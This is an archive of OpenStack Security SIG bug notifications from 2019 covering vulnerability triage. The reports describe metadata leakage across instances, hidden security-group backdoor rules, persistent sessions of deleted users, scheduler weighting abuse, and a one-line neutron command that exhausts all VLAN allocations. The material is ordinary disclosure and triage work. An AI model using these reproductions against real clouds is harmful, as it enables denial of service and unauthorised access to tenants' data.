From lbragstad at gmail.com Wed Sep 4 16:52:17 2019 From: lbragstad at gmail.com (Lance Bragstad) Date: Wed, 04 Sep 2019 16:52:17 -0000 Subject: [Openstack-security] [Bug 1578466] Re: oslo.cache should offer encryption in a similar manner to keystonemiddleware References: <20160505031406.17572.11746.malonedeb@soybean.canonical.com> Message-ID: <156761593784.17269.11487011463741085812.launchpad@gac.canonical.com> ** Description changed: Keystone middleware's caching of tokens offers HMAC validation and encryption of the tokens in the cache. This is important because memcache has literally zero authentication or protection from any user on the system. So this feature should be ported in from keystone middleware into keystone. + + Encrypted caching implementation: https://opendev.org/openstack/keystonemiddleware/src/commit/0a65b1420799e7c7f8736e9f6c234f755ab5ac6b/keystonemiddleware/auth_token/_cache.py#L254-L297 + Caching configuration via ksm: https://opendev.org/openstack/keystonemiddleware/src/commit/0a65b1420799e7c7f8736e9f6c234f755ab5ac6b/keystonemiddleware/auth_token/_opts.py#L113-L122 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1578466 Title: oslo.cache should offer encryption in a similar manner to keystonemiddleware Status in OpenStack Identity (keystone): Won't Fix Status in oslo.cache: Confirmed Bug description: Keystone middleware's caching of tokens offers HMAC validation and encryption of the tokens in the cache. This is important because memcache has literally zero authentication or protection from any user on the system. So this feature should be ported in from keystone middleware into keystone. Encrypted caching implementation: https://opendev.org/openstack/keystonemiddleware/src/commit/0a65b1420799e7c7f8736e9f6c234f755ab5ac6b/keystonemiddleware/auth_token/_cache.py#L254-L297 Caching configuration via ksm: https://opendev.org/openstack/keystonemiddleware/src/commit/0a65b1420799e7c7f8736e9f6c234f755ab5ac6b/keystonemiddleware/auth_token/_opts.py#L113-L122 To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1578466/+subscriptions From gagehugo at gmail.com Thu Sep 5 15:19:34 2019 From: gagehugo at gmail.com (Gage Hugo) Date: Thu, 05 Sep 2019 15:19:34 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <156769677422.435.13287539548721203392.malone@wampee.canonical.com> Agreed on C1 for this. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. 
Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From fungi at yuggoth.org Thu Sep 5 14:52:34 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 05 Sep 2019 14:52:34 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <156769515432.6589.8573733864708702347.malone@soybean.canonical.com> Reviewing our taxonomy, this probably fits closest as a class C1 report due to depending on the existence of other exploitable bugs to leverage. https://security.openstack.org/vmt-process.html#incident-report-taxonomy ** Information type changed from Private Security to Public ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. 
That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From 1841933 at bugs.launchpad.net Thu Sep 5 15:06:58 2019 From: 1841933 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 05 Sep 2019 15:06:58 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <156769602031.1159.2950855130621818631.launchpad@wampee.canonical.com> ** Changed in: nova Status: New => In Progress -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From fungi at yuggoth.org Thu Sep 5 17:15:23 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 05 Sep 2019 17:15:23 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <156770372495.29497.5155189746705580606.launchpad@chaenomeles.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. 
Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From 1824248 at bugs.launchpad.net Thu Sep 12 20:06:53 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 12 Sep 2019 20:06:53 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (master) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <156831881378.16566.6955098732031934554.malone@gac.canonical.com> Fix proposed to branch: master Review: https://review.opendev.org/681910 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. 
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Thu Sep 12 20:13:54 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 12 Sep 2019 20:13:54 -0000 Subject: [Openstack-security] [Bug 1824248] Related fix proposed to neutron-tempest-plugin (master) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <156831923447.16948.15624103023818108962.malone@gac.canonical.com> Related fix proposed to branch: master Review: https://review.opendev.org/681912 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. 
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From fungi at yuggoth.org Fri Sep 13 17:33:53 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 13 Sep 2019 17:33:53 -0000 Subject: [Openstack-security] [Bug 1818239] Re: scheduler: build failure high negative weighting References: <155144918750.17390.5769092718170590059.malonedeb@soybean.canonical.com> Message-ID: <156839603345.425.12357429312427701428.malone@wampee.canonical.com> Since this has come up again in bug 1581977 as representing a security- related concern, I'm adding the security bugtag to it for increased visibility. Note this is not the same as treating it as a security vulnerability, and I don't have the impression that any CVE assignment or security advisory is warranted for this. ** Information type changed from Public Security to Public ** Also affects: ossa Importance: Undecided Status: New ** Changed in: ossa Status: New => Won't Fix ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1818239 Title: scheduler: build failure high negative weighting Status in OpenStack nova-cloud-controller charm: Fix Released Status in OpenStack Compute (nova): Incomplete Status in OpenStack Security Advisory: Won't Fix Status in nova package in Ubuntu: Triaged Bug description: Whilst debugging a Queens cloud which seems to be landing all new instances on 3 out of 9 hypervisors (which resulted in three very heavily overloaded servers) I noticed that the weighting of the build failure weighter is -1000000.0 * number of failures: https://github.com/openstack/nova/blob/master/nova/conf/scheduler.py#L495 This means that a server which has any sort of build failure instantly drops to the bottom of the weighed list of hypervisors for scheduling of instances. Why might a instance fail to build? Could be a timeout due to load, might also be due to a bad image (one that won't actually boot under qemu). This second cause could be triggered by an end user of the cloud inadvertently causing all instances to be pushed to a small subset of hypervisors (which is what I think happened in our case). This feels like quite a dangerous default to have given the potential to DOS hypervisors intentionally or otherwise. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: nova-scheduler 2:17.0.7-0ubuntu1 ProcVersionSignature: Ubuntu 4.15.0-43.46-generic 4.15.18 Uname: Linux 4.15.0-43-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 Date: Fri Mar 1 13:57:39 2019 NovaConf: Error: [Errno 13] Permission denied: '/etc/nova/nova.conf' PackageArchitecture: all ProcEnviron: TERM=screen-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=C.UTF-8 SHELL=/bin/bash SourcePackage: nova UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/charm-nova-cloud-controller/+bug/1818239/+subscriptions From 1840895 at bugs.launchpad.net Mon Sep 16 15:40:31 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 16 Sep 2019 15:40:31 -0000 Subject: [Openstack-security] [Bug 1840895] Re: segment parameter check failed when creating network References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156864843178.13411.1302237967966791858.malone@gac.canonical.com> Reviewed: https://review.opendev.org/679510 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b Submitter: Zuul Branch: master commit f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b Author: Slawek Kaplonski Date: Fri Aug 30 22:32:19 2019 +0200 Fix creation of vlan network with segmentation_id set to 0 In case when vlan network was created with segmentation_id=0 and without physical_network given, it was passing validation of provider segment and first available segmentation_id was choosen for network. Problem was that in such case all available segmentation ids where allocated and no other vlan network could be created later. This patch fixes validation of segmentation_id when it is set to value 0. Change-Id: Ic768deb84d544db832367f9a4b84a92729eee620 Closes-bug: #1840895 ** Changed in: neutron Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Sep 17 07:00:29 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 17 Sep 2019 07:00:29 -0000 Subject: [Openstack-security] [Bug 1840895] Fix proposed to neutron (stable/stein) References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156870362941.504.6469634524896376941.malone@wampee.canonical.com> Fix proposed to branch: stable/stein Review: https://review.opendev.org/682557 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Sep 17 07:00:46 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 17 Sep 2019 07:00:46 -0000 Subject: [Openstack-security] [Bug 1840895] Fix proposed to neutron (stable/rocky) References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156870364623.4548.2200167894476769029.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.opendev.org/682558 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. 
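For illustration, the failure mode reported here is the usual falsy-zero pitfall: a truthiness check on segmentation_id treats 0 the same as "not supplied", so the value never reaches range validation and the request falls through to automatic VLAN allocation. A minimal sketch of the corrected check, using hypothetical names rather than the real validate_provider_segment code:

    # Hypothetical sketch only, not the actual neutron type driver code.
    MIN_VLAN_TAG, MAX_VLAN_TAG = 1, 4094

    def validate_segment(segmentation_id):
        # Buggy pattern: "if segmentation_id:" is False for 0, so an explicit
        # segmentation_id of 0 silently skips validation. Comparing against
        # None instead keeps 0 in the range check.
        if segmentation_id is not None:
            if not MIN_VLAN_TAG <= segmentation_id <= MAX_VLAN_TAG:
                raise ValueError("segmentation_id must be in the range %d "
                                 "through %d" % (MIN_VLAN_TAG, MAX_VLAN_TAG))

    try:
        validate_segment(0)
    except ValueError as exc:
        print(exc)  # rejected with the None check; accepted silently before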
To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Sep 17 07:01:00 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 17 Sep 2019 07:01:00 -0000 Subject: [Openstack-security] [Bug 1840895] Fix proposed to neutron (stable/queens) References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156870366056.4548.5929678126225878182.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/queens Review: https://review.opendev.org/682559 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Thu Sep 19 10:11:54 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 19 Sep 2019 10:11:54 -0000 Subject: [Openstack-security] [Bug 1840895] Fix included in openstack/neutron 15.0.0.0b1 References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156888791484.13660.18360014417264119768.malone@gac.canonical.com> This issue was fixed in the openstack/neutron 15.0.0.0b1 development milestone. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1824248 at bugs.launchpad.net Thu Sep 19 10:13:44 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 19 Sep 2019 10:13:44 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 15.0.0.0b1 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <156888802461.13927.12556205472513095971.malone@gac.canonical.com> This issue was fixed in the openstack/neutron 15.0.0.0b1 development milestone. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. 
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From fungi at yuggoth.org Thu Sep 19 14:51:22 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 19 Sep 2019 14:51:22 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156890468258.5220.7066900126018275014.malone@chaenomeles.canonical.com> Thanks, I'm marking our security advisory task "won't fix" and lifting the private embargo, treating this as a class D report indicating a need for documentation improvements: https://security.openstack.org/vmt- process.html#incident-report-taxonomy ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags added: security ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. 
All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). 
==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1842930 at bugs.launchpad.net Thu Sep 19 15:12:40 2019 From: 1842930 at bugs.launchpad.net (Akihiro Motoki) Date: Thu, 19 Sep 2019 15:12:40 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156890596051.32759.851593505395098577.malone@wampee.canonical.com> > Thank you for pointing the SESSION_TIMEOUT option. I was looking through Horizon options to mitigate this problem and thought about using it. For more detail, there are two options involved in horizon. - SESSION_TIMEOUT - SESSION_REFRESH If SESSION_REFRESH is set to True (current default), a shorter SESSION_TIMEOUT would not matter for most cases. > So is the default keystonemiddleware cache expiration time in such deployment equals to 300 sec? Although I can look up token's expiration time, issuing "openstack token issue" command. The default value is defined here [1]. You can test the timeout of keystonemiddlware cache using curl. [2] is an example in my devstack environment. L.39-49 retrieves a token before the user is deleted and tests it works. L.81 confirms the token is still valid just after the user is deleted. I confirmed the curl command failed with auth error a couple of minuites later (though the paste does not cover it). You can try the similar. [1] https://opendev.org/openstack/keystonemiddleware/src/branch/master/keystonemiddleware/auth_token/_opts.py#L107-L112 [2] http://paste.openstack.org/show/777693/ -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. 